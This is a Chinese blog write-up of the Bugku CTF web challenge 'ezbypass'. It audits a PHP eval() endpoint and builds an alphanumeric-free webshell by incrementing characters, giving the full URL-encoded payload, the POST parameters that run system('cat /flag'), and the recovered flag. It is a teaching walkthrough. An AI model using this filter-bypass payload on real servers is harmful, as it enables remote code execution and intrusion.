BUGKU-WEB ezbypass

原创 已于 2024-03-12 21:13:46 修改 · 2k 阅读 · 27 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#BUGKU

于 2024-03-12 21:08:38 首次发布
文章讲述了如何在PHP代码审计中构造一个不包含字母、数字和特殊字符的字符串,通过正则表达式检查并利用自增绕过机制实现无字母数字webshell,以及利用`isset()`和`system()`函数进行远程代码执行(RCE)的示例和技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目描述

题目截图如下:
在这里插入图片描述

进入场景看看:
在这里插入图片描述

解题思路

  • 代码审计题目
  • 发现需要构造一个字符串,使得它不包含字母、数字、特殊字符的PHP代码片段,长度小于105,然后传递给$code
  • post提交参数,eval()执行
  • 是一个关于无字母数字webshell的题目,自增绕过

相关工具

  • post,拿出hackbar
  • 正则表达:https://www.mklab.cn/utils/regex
  • url编码:https://www.urlencoder.net/

解题步骤

  1. 审计代码
<?php                   
error_reporting(0);                   
highlight_file(__FILE__);                       

if (isset($_POST['code'])) {  #  检查是否通过POST请求提交了名为"code"的参数。            
    $code = $_POST['code'];       # 将POST请求中的"code"参数的值赋给变量$code。    
    if (strlen($code) <= 105){    #  检查$code的长度是否小于等于105个字符。           
        if (is_string($code)) {   # 检查$code是否为字符串类型。                      
            if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/" ,$code)){
            #   使用正则表达式检查$code是否不包含其中字母数字和其他字符。       
                eval($code);  #  如果$code满足以上所有条件,则执行eval函数,将$code作为PHP代码执行。
            } else {                            
                echo "Hacked!"; # 如果$code包含不允许的字符,则输出"Hacked!",表示该代码可能被黑客修改。                     
            }
        } else { 
            echo "You need to pass in a string"; #  如果$code不是字符串类型,则输出"You need to pass in a string",表示需要传递一个字符串类型的参数。                      
        }
    } else { 
            echo "long?";  # 如果$code的长度超过105个字符,则输出"long?",表示代码太长了。                         
    }  
}
  1. fuzz测试正则还有哪些字符没有被过滤:
for ($i=32;$i<127;$i++){
    if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/" ,$code)){
        echo chr($i);
    }
}

输出:

 !$'()+,./;=[]_

for循环中,这个i从32到127的意思是(ASCII三种进制对照表):过一遍这些字符
在这里插入图片描述

接下来就要使用 !$'()+,./;=[]_来构造payload 执行RCE。什么是RCE?见后面的知识点部分

  1. 目前需要显示flag,那可能需要 cat /flag命令
  2. 使用函数system:system('cat /flag'),请查看后文知识点。(不知道这里理解错了没...)
  3. 那么现在要做的就是使用$_=()[];+\$来绕过之前的正则表达式,也就是code的内容
_=system&__=cat /flag&code=
_=system&__=cat /f*&code=
  1. 大佬给的POC:
_=system&__=cat /flag&code=%24_%3D(_%2F_._)%5B_%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24__.%24_%3B%24_%2B%2B%3B%24__%3D%24__.%24_%3B%24_%3D_.%24__%3B%24%24_%5B_%5D(%24%24_%5B__%5D)%3B

%24_%3D(_%2F_._)%5B_%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24__.%24_%3B%24_%2B%2B%3B%24__%3D%24__.%24_%3B%24_%3D_.%24__%3B%24%24_%5B_%5D(%24%24_%5B__%5D)%3B

之前的那个105的限制就在这里体现,要是使用get来编写payload的话,会超过这个105.(感兴趣的可以去数数-_-)

解码后就是:

$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);

格式化后:

$_=(_/_._)[_]; # _/\_ == NAN  有些地方时(0/0).
$_++; 
$__=$_.$_++;
$_++;$_++;$_++;
$__=$__.$_;
$_++;
$__=$__.$_;
$_=_.$__;

$$_[_]($$_[__]);

$_:这里的单个下划线,看作是变量1
$__:这里的双下划线,看做是变量2

不理解没关系,你可以把代码放本地去运行试试就知道了

<?php
$_=(_/_._)[_];
var_dump($_); # 输出N

说明:_/_ == NAN,目的是得到N这个字母,方便自增得到P。除了_/_ 外还空数组、无限大:
在这里插入图片描述

<?php
$_=(_/_._)[_];
var_dump($_);#输出N

<?php
$_=(_/_._)[_];
$_++; 
var_dump($_); # 输出O

<?php
$_=(_/_._)[_];
$_++; 
$__=$_.$_++;
var_dump($__);# 输出PO

<?php
$_=(_/_._)[_];
$_++; 
$__=$_.$_++;
$_++;$_++;$_++;
$__=$__.$_;
var_dump($__);# 输出POS

<?php
$_=(_/_._)[_];
$_++; 
$__=$_.$_++;
$_++;$_++;$_++;
$__=$__.$_;
$_++;
$__=$__.$_;
$_=_.$__;
var_dump($_); # 输出_POST

至于下面代码:

$$_[_]($$_[__]);
#也就是 $_POST[_]($_POST[__])

解释如下:

  • $_POST 变量用来收集表单数据,
  • 这里$_POST[_] ($_POST[__]),就是要给_和__进行传参,()的意思应该是分传参的先后次序咯。
    在这里插入图片描述
    在这里插入图片描述

得到Flag

flag{2973f3b4a67d74882bab11b75f37cef7}

在这里插入图片描述

新知识点

  1. isset() 函数:检测变量是否已设置并且非 NULL
    在这里插入图片描述
  2. RCE理解
  • 远程命令/代码执行漏洞,简称RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
  • RCE分为远程命令执行ping和远程代码执行evel。
  1. PHP中system函数

在这里插入图片描述4.ASCII三种进制对照表、二进制、字节
5. Perl 特殊变量

参考链接

  1. 总结rce(远程代码执行各种sao姿势)绕过bypass

在这里插入图片描述
2. 从CTFShow[RCE挑战]中学习自增构造webshell,这篇文章介绍很详细

  • 什么是自增:
    当我们通过某种方法可以得到一个字符时,我们就可以通过自增来获取其他字符
  1. 题目讲解4
    在这里插入图片描述
  2. ctfshow–RCE极限挑战

有用的话,请点赞收藏评论,帮助更多的同学哦

bugku ezbypass
m_de_g的博客
04-23 1089
bugku ezbypass $++,$_++
bugku-web-GET解析过程
weixin_46168073的博客
11-14 1279
一、启动场景 二、解题过程 点进去得到 可以看到这是一个if语句,判断条件为what=='flag'就会显示出echo 下的'flag",那我们直接在地址后面,写上?what=flag。 然后就得到了flag,直接复制粘贴到记事本,然后在复制粘贴到提交框。 点击提交。 ...
buuctf ez bypass
ANYOUZHEN的博客
05-25 359
根据提示,f12查看源代码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg
CTF web BugKu ezbypass(自增绕过,命令执行)
最新发布
2301_79806187的博客
05-14 313
/ 思路:利用eval($code)执行eval($_POST[_]($_POST[__])),获取_和__两个参数,_的值为system,__的值为cat/flag,难点在于自增绕过。// _/_ 首先未定义变量_会被当成字符串,然后_/_字符串参与除法运算会首先转换成数字0,于是0/0就会得到一个NAN,// NAN._使用字符串连接符.连接字符_,就会先将NAN转换成字符串,然后再与_连接,得到字符串“NAN_"。// 利用(NAN_)[_]获得第一个字符N,将其赋值给变量$_,于是$_=N。
BUUCTF-Ez_bypass
m0_47571887的博客
11-10 667
打开题目, 很杂乱,我们右键查看一下源码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $
bugku学习之26.过狗一句话 - 解题及其它完整(bypass绕过)重点!!!
s11show_163的博客
03-01 1165
打不开但是原理比较重要,去回顾bypass安全狗绕过的相关知识 用php的系统函数,突破低权限。 题目来自于bugku的"过狗一句话",这道题目有接近2100人做出来,可是网上的wp并没有给出确切的原理,所以在此借这一道题目,抛砖引入。 一丶代码和分析 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); //exp...
buuctf [MRCTF2020]Ez_bypass
stantic的博客
03-20 475
id和gg的md5强比较相等,id和gg的值弱比较不相等,password不是数字并且与1234567弱比较相等,由此构建id[]=1&gg[]=2 passwd=1234567q flag{7038d50b-bff2-432d-85bc-eefe852120cc}
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
[Bugku-AWD专版]一款用于AWD比赛中的自动化攻击框架.zip
09-30
Bugku-AWD专版】是一款专为AWD(Attack With Defense)比赛设计的自动化攻击框架,它旨在帮助参赛者更高效地进行攻防对抗。这个框架的核心目标是简化比赛过程中对目标系统的攻击策略和自动化执行,使得参赛者能够...
bugku-web-POST解析过程
weixin_46168073的博客
11-14 1728
一、启动场景 首先,老规矩,我们启动场景。 二、解题过程 这里看到和之前GET提交一样的东西,我们直接在后面输入和get一样的东西?what=flag,发现没用。 可见POST提交和GET提交的不一样。 然后我们下载hackbar工具。 这里我用的火狐。可以在github上下,也可以直接导包。2.1.3之前的免费,之后的收费。 这里百度网盘给个链接。 链接:https://pan.baidu.com/s/1FaVcS-zCaQEXs-FJM0BLCw 提取码:1234 ...
BugKu-web---程序员本地网站
MIGENGKING的博客
04-13 903
打开链接: 题目提示“本地访问!”,和“localhost”’ 因此用burpsuite抓包加上加上:X-Forwarded-For: 127.0.0.1 首先: X-Forwarded-For: 简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。 接着: 127.0.0.1是回送地址,指本地...
[MRCTF2020]Ez_bypass
m0_56691564的博客
10-18 264
页面出现了变化,继续向页面传参,由于上面必须使输入不能是纯数字,利用passwd与1234567比较的时候是弱类型比较,而我们知道,弱类型比较会先在比较前将比较的两边转化成同一种类型,当 if(12s==12) 比较时,这里12s会被转化成12 ,故返回true。打开页面看见一堆代码,因此构造payload。
[MRCTF2020]Ez_bypass --BUUCTF
金 帛的博客
06-12 309
BUUCTF记录贴
buucft-[MRCTF2020]Ez_bypass(小宇特详解)
小宇的web博客
01-26 617
buucft-[MRCTF2020]Ez_bypass(小宇特详解) 先看题,比较乱查看源码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) ===
Buuctf [MRCTF2020]Ez_bypass 1 WP解析
qq_60115503的博客
11-10 946
md5函数不能处理数组,处理数组会报错,就会返回null,然后经过md5就相等了,传入的参数不同,gg和id的值就不同。b=240610708,加密后为0e462097431906509019562988736854。有了回显,是一个warning的报错说明我们的GET的md5弱比较执行成功,接着审计剩下的代码。a=QNKCDZO,加密后为0e830400451993494058024219903391。=b,也满足了md5($a) == md5($b)修改后直接发送包获得flag。
[web][buuoj]Ez_bypass
weixin_46050117的博客
10-27 753
ctf
Bugku CTF WEB解题技巧分享与讨论
标题和描述中提到的知识点主要涉及CTF(Capture The Flag,夺旗赛)中的WEB类型题目,以及解题思路和writeup的编写和分享。下面详细说明这些知识点: 1. CTF概念解析 CTF是一种信息安全竞赛,通常分为多种类型,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值